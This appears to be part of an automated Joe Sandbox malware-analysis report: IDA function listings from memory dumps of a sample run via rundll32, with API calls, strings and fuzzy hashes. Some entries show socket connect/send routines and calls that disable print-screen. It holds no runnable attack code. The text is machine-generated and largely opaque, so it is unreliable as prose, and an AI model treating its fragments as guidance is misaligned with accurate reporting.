                    • Instruction Fuzzy Hash: FD51E575808205AFF711DF64CC44FFA37A8EF4A308F058568FE489B252E731A54487A2
                    APIs
                    • getsockname.WS2_32 ref: 6D025CD2
                    • accept.WS2_32(?,FFFFFFFF,?), ref: 6D025CEF
                      • Part of subcall function 6D03EFA0: ioctlsocket.WS2_32(00000024,8004667E,00000000), ref: 6D03EFBB
                    Strings
                    • Error accept()ing server connect, xrefs: 6D025D04
                    • Connection accepted from server, xrefs: 6D025D2F
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: acceptgetsocknameioctlsocket
                    • String ID: Connection accepted from server$Error accept()ing server connect
                    • API String ID: 36920154-1795061160
                    • Opcode ID: 2295b3271ea21f4e4be512ec8e1c820192286dbbeb3da04e50bfcd6fee6b95ae
                    • Instruction ID: 230893fedba9b4860dfbfdec96f6d44ceb6501d8a9dd97928dcefe87279b4ab5
                    • Opcode Fuzzy Hash: 2295b3271ea21f4e4be512ec8e1c820192286dbbeb3da04e50bfcd6fee6b95ae
                    • Instruction Fuzzy Hash: 0331E675604201ABF720DF24DC81FFBB7E8FB85314F40452AF698D7181DB7595098BA2
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB1AB6
                      • Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB2192
                      • Part of subcall function 04EB217D: __CxxThrowException@8.LIBCMT ref: 04EB21A7
                      • Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB21B8
                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB1AED
                      • Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB2145
                      • Part of subcall function 04EB2130: __CxxThrowException@8.LIBCMT ref: 04EB215A
                      • Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB216B
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                    • String ID: invalid string position$string too long
                    • API String ID: 1823113695-4289949731
                    • Opcode ID: 3358d523a98d17f5f8b844d131bf4ae1a4c35ad522d7e43a906b8a02217aec70
                    • Instruction ID: 9401edc0c607b006548c1e3565efba1ce1a7cdc9fa82237bd5fec3a523d207b7
                    • Opcode Fuzzy Hash: 3358d523a98d17f5f8b844d131bf4ae1a4c35ad522d7e43a906b8a02217aec70
                    • Instruction Fuzzy Hash: E121A2323002108BC721DE6CE8A0AD7F7A9DB917F5B141A2EE2C1CB240D671F84187E5
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 6CFF1DAF
                      • Part of subcall function 6D04A35E: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,?,?,?,6CFF5117,?,6D086668,?,?,?,?,?,?), ref: 6D04A38E
                      • Part of subcall function 6D04A35E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,6CFF5117,?,6D086668,?,?,?,?,?,?), ref: 6D04A3BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: DisableExceptionPrintRaiseScreen@@___std_exception_copy
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 1900483484-1866435925
                    • Opcode ID: 322e17e3b45879c3c0a045f82564d3ffeba2700b032003942d639ea74b78f8e8
                    • Instruction ID: b9ea60667bdc304506983d789a6c04e12616b7c1b84f911f6d59292bc7504bf1
                    • Opcode Fuzzy Hash: 322e17e3b45879c3c0a045f82564d3ffeba2700b032003942d639ea74b78f8e8
                    • Instruction Fuzzy Hash: AF1127F2900304ABDB10CF58C801F9AB3ACEF05314F24C52AF9649BA81E772E514CBE2
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB166A
                      • Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB2145
                      • Part of subcall function 04EB2130: __CxxThrowException@8.LIBCMT ref: 04EB215A
                      • Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB216B
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                    • String ID: vector<T> too long$yxxx$yxxx
                    • API String ID: 1823113695-1517697755
                    • Opcode ID: 71e5285a3ec3b3a527066fa607a52a7d379692879ae06fd4d3c4c7eb1dbf83e3
                    • Instruction ID: 38317a0eb860d190426654e022820826456ff47ec56fb892ac8decaf522e0f42
                    • Opcode Fuzzy Hash: 71e5285a3ec3b3a527066fa607a52a7d379692879ae06fd4d3c4c7eb1dbf83e3
                    • Instruction Fuzzy Hash: 41210AB2E002055FD308CF5DD991A9BB7A9E7C8355F15066AE9459B344EA387C008BD0
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB14BE
                      • Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB2145
                      • Part of subcall function 04EB2130: __CxxThrowException@8.LIBCMT ref: 04EB215A
                      • Part of subcall function 04EB2130: std::exception::exception.LIBCMT ref: 04EB216B
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                    • String ID: vector<T> too long$yxxx$yxxx
                    • API String ID: 1823113695-1517697755
                    • Opcode ID: e844ccb78499116dc95ec8751b509f87c8bf9846c34a7b68b279084adbe53a94
                    • Instruction ID: 457bf06dbeeec00145e08cf8fb17132020574f32ec802fe58f8b487c80f60055
                    • Opcode Fuzzy Hash: e844ccb78499116dc95ec8751b509f87c8bf9846c34a7b68b279084adbe53a94
                    • Instruction Fuzzy Hash: 58F0C223B000221B871C583DAD644FFE68687D03E6319A639E987CF789F820BC8192D0
                    APIs
                    • send.WS2_32(?,?,00000003,00000000), ref: 6D02E18D
                    • WSAGetLastError.WS2_32 ref: 6D02E197
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastsend
                    • String ID: SENT$Sending data failed (%d)
                    • API String ID: 1802528911-3459338696
                    • Opcode ID: af30eeaaef9318ac8ff4746b3ab1df43d608f28573854d823f8c6afb4b93428c
                    • Instruction ID: aef11885d7774b31800761c5341b95f764a062540fe78da19ae7afbc118b83a9
                    • Opcode Fuzzy Hash: af30eeaaef9318ac8ff4746b3ab1df43d608f28573854d823f8c6afb4b93428c
                    • Instruction Fuzzy Hash: C6F0BB7214D341BFE302DB58DC40F6B7BB8AF4A324F14455CF2989B192D322951587A7
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D04DA83,00000000,?,00000001,?,?,?,6D04DB72,00000001,FlsFree,6D07EAC0,FlsFree), ref: 6D04DADF
                    • GetLastError.KERNEL32(?,6D04DA83,00000000,?,00000001,?,?,?,6D04DB72,00000001,FlsFree,6D07EAC0,FlsFree,00000000,?,6D04CA8F), ref: 6D04DAE9
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D04DB11
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID: api-ms-
                    • API String ID: 3177248105-2084034818
                    • Opcode ID: 1ef20a109c2e55809cead6f0748976cd6ccbe4ab51624f58aaa483d75cb21a5a
                    • Instruction ID: 8a4f5755f1b772d5a4a07f46da53108a6bde36a3f537cc4c589a9c99e06ef74c
                    • Opcode Fuzzy Hash: 1ef20a109c2e55809cead6f0748976cd6ccbe4ab51624f58aaa483d75cb21a5a
                    • Instruction Fuzzy Hash: 19E01A3074820AF6FF111B61DC05F6D3FB9AB43BA4F108130F90CE9096DB62E41089D4
                    APIs
                    • GetConsoleOutputCP.KERNEL32(93BD9D6B,00000000,00000000,?), ref: 6D05E652
                      • Part of subcall function 6D064AF8: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D0641B9,?,00000000,-00000008), ref: 6D064B59
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6D05E8A4
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D05E8EA
                    • GetLastError.KERNEL32 ref: 6D05E98D
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                    • String ID:
                    • API String ID: 2112829910-0
                    • Opcode ID: 5df4c2b6d3f0b114c8cf61ea89f9d540c7887542641bed8be26c5b2427115fa7
                    • Instruction ID: 3b27479563ebb34f14c87124f3f37ed5a805358e6a087c9c96ceefd8111ffd8a
                    • Opcode Fuzzy Hash: 5df4c2b6d3f0b114c8cf61ea89f9d540c7887542641bed8be26c5b2427115fa7
                    • Instruction Fuzzy Hash: A0D19D75D042599FDF01CFA8C980AADBBF5FF4A314F24452AE9A5EB341D730A911CB60
                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6D06DB8F), ref: 6D06E23C
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000001,?,?), ref: 6D06E3B0
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000002,?,?), ref: 6D06E3F6
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: DisablePrintScreen@@$DecodePointer
                    • String ID:
                    • API String ID: 1200762580-0
                    • Opcode ID: f00d154e6b9ef1c2d448d188b887545cfe169808c9bade9c840f67a052dc42c8
                    • Instruction ID: c0f6100f928369e5a133a144887c86fc11a50ea62354dbd4ff87fcd054f86aea
                    • Opcode Fuzzy Hash: f00d154e6b9ef1c2d448d188b887545cfe169808c9bade9c840f67a052dc42c8
                    • Instruction Fuzzy Hash: FC51487590875BCBEF008F69DD4C3AD7BB5FB46700F818055D490EA258CB3485668FA6
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d1cf0cf6feea0333dc13c314016054939da666dd71bbd74081955fe01c82cd84
                    • Instruction ID: b9016653886e304f70c2d21afb34a4fa9a5b89fd61dc60a2bee74e0c29c68a03
                    • Opcode Fuzzy Hash: d1cf0cf6feea0333dc13c314016054939da666dd71bbd74081955fe01c82cd84
                    • Instruction Fuzzy Hash: 4A41C775A44748AFF7149F78CE41BAABFE9EB48710F108539E915DB280D7B1A550C780
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __calloc_crt__init_pointers__mtterm_free
                    • String ID:
                    • API String ID: 3556499859-0
                    • Opcode ID: b188500a3c1a0b6836b8d1b60a3ba4c009d566f15eabf9a274527e3b55d9f75c
                    • Instruction ID: 3581c661d942ceb83f9ccc1086a434ca1af91bfe7792717dc079ca72a80f4cc2
                    • Opcode Fuzzy Hash: b188500a3c1a0b6836b8d1b60a3ba4c009d566f15eabf9a274527e3b55d9f75c
                    • Instruction Fuzzy Hash: A8315C71800A31AEFB11AF75AC88A793FB6EB59368710D62EE815D72B0DB31D442CF51
                    APIs
                      • Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE4417
                      • Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE4431
                      • Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE447B
                    • _memset.LIBCMT ref: 04EE5B6E
                    • _strrchr.LIBCMT ref: 04EE5B93
                    • _strtok.LIBCMT ref: 04EE5BA1
                    • _strtok.LIBCMT ref: 04EE5C52
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$_strtok$_strrchr
                    • String ID:
                    • API String ID: 1565559595-0
                    • Opcode ID: 7d8b75343decb582a6549e4d2e3b7885064fb2ddfcb991ca9c242b384ae37a01
                    • Instruction ID: 0b160dbeac40c45e3b9162aeaef40079df82c75e0393d4b7f6ae3c0fa7f6d399
                    • Opcode Fuzzy Hash: 7d8b75343decb582a6549e4d2e3b7885064fb2ddfcb991ca9c242b384ae37a01
                    • Instruction Fuzzy Hash: E6312D71D04214ABFB21D7658C55FFB77A49F45709F0445D0EA45AB1C0EBB0BA848BA1
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 04EBDF90
                    • __isleadbyte_l.LIBCMT ref: 04EBDFC3
                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,00000103,00000000,00000000), ref: 04EBDFF4
                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,?,?,00000103,00000000,00000000), ref: 04EBE062
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: afc24a13ba7713e0e9b49715ac06d88f8d8c5c974821e97ee5520ed25c17e160
                    • Instruction ID: 05c68556774aae82d20385beb5853ee6488e636dd2cce6d211770268db225ed3
                    • Opcode Fuzzy Hash: afc24a13ba7713e0e9b49715ac06d88f8d8c5c974821e97ee5520ed25c17e160
                    • Instruction Fuzzy Hash: 3B31BD31A04246EFDB21DFA8CC84DFF7BB2AF01314F0895A8E4918B191E331E990DB91
                    APIs
                      • Part of subcall function 6D064AF8: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D0641B9,?,00000000,-00000008), ref: 6D064B59
                    • GetLastError.KERNEL32 ref: 6D0666FB
                    • __dosmaperr.LIBCMT ref: 6D066702
                    • GetLastError.KERNEL32(?,?,?,?), ref: 6D06673C
                    • __dosmaperr.LIBCMT ref: 6D066743
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                    • String ID:
                    • API String ID: 1913693674-0
                    • Opcode ID: b331abaa26aeb0927d4f5842f6cd4bc33f5e664143730ee2bdba0e05b3b93bd5
                    • Instruction ID: ac787d7d872bd414258c43c279d064a6349e1fd34d0c1b067aeb3f5c1fa5825a
                    • Opcode Fuzzy Hash: b331abaa26aeb0927d4f5842f6cd4bc33f5e664143730ee2bdba0e05b3b93bd5
                    • Instruction Fuzzy Hash: D021D371608296BFEB009F66D880B6AB7B9FF05364B81859DFA1997140DB30EC108BF0
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3a356ee1e89bad6c13cf9da13403dc4a6603805719fe148ab2e406270f0d0239
                    • Instruction ID: 37c4d9e86e3ba8249adf5587c214766756623e5d714131de594ba62e0e49d7ba
                    • Opcode Fuzzy Hash: 3a356ee1e89bad6c13cf9da13403dc4a6603805719fe148ab2e406270f0d0239
                    • Instruction Fuzzy Hash: 68216F3961C206BFFB109F6BCE44BAA77A9EF493687018514FE1497140E770EC7087A0
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 6D067640
                      • Part of subcall function 6D064AF8: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D0641B9,?,00000000,-00000008), ref: 6D064B59
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D067678
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D067698
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                    • String ID:
                    • API String ID: 158306478-0
                    • Opcode ID: a4e256c92a882acff1bfb7e3edd03591efc1b46c806e4cc0085297c9bc7533ab
                    • Instruction ID: e903d2297bff8408c0030af23c87bf287b7223a93e7b390bec8d911d35d46976
                    • Opcode Fuzzy Hash: a4e256c92a882acff1bfb7e3edd03591efc1b46c806e4cc0085297c9bc7533ab
                    • Instruction Fuzzy Hash: DE11EDF1A492567FFB12177A4C8CEAF69BCDE873983520128FA00E2500EBA5DD0082B4
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,6CFF9E6C,?,00000000,00000000,00000008,6CFF1FE0,00000000), ref: 6CFFEED3
                    • __alldvrm.LIBCMT ref: 6CFFEEED
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CFFEF14
                    • GetTickCount.KERNEL32 ref: 6CFFEF31
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1296068966-0
                    • Opcode ID: ebcaec619d1176244b613c3e750bb973f5ea5cb7627150aa257b0b48492eff31
                    • Instruction ID: 142cc63c1bb37841dc1bffdb82d1fb72ead5661c64e4df8e50b05cf995b1c347
                    • Opcode Fuzzy Hash: ebcaec619d1176244b613c3e750bb973f5ea5cb7627150aa257b0b48492eff31
                    • Instruction Fuzzy Hash: 5F118C71508305EFDB449F68ED44B1AFBF8EB8A300F508629F218C6251E732A848DB55
                    APIs
                    Strings
                    • Unknown error %u (0x%08X), xrefs: 6D01A982
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: Unknown error %u (0x%08X)
                    • API String ID: 1452528299-1058733786
                    • Opcode ID: ea230bea458f4dd26124594899263422b683925f93210ececd88439ed08a3fe9
                    • Instruction ID: 6dc19f7f8cabf8c6435414fa0c3d2955a0fb0cb140ff14f1f13cd15ef3a03cf9
                    • Opcode Fuzzy Hash: ea230bea458f4dd26124594899263422b683925f93210ececd88439ed08a3fe9
                    • Instruction Fuzzy Hash: 8301B17150C206AFE7006FA59C44F6FBBECEF82269F220419F90597152E761984587B2
                    APIs
                    • WSAStartup.WS2_32(00000202,?), ref: 04EC74B1
                    • InitializeCriticalSection.KERNEL32(?), ref: 04EC74BE
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EC74C9
                    • __time64.LIBCMT ref: 04EC74EC
                      • Part of subcall function 04EB27AA: GetSystemTimeAsFileTime.KERNEL32(04EC49EE,?,?,?,04EC49EE,?), ref: 04EB27B5
                      • Part of subcall function 04EB27AA: __aulldiv.LIBCMT ref: 04EB27D5
                      • Part of subcall function 04EB2777: __getptd.LIBCMT ref: 04EB277C
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
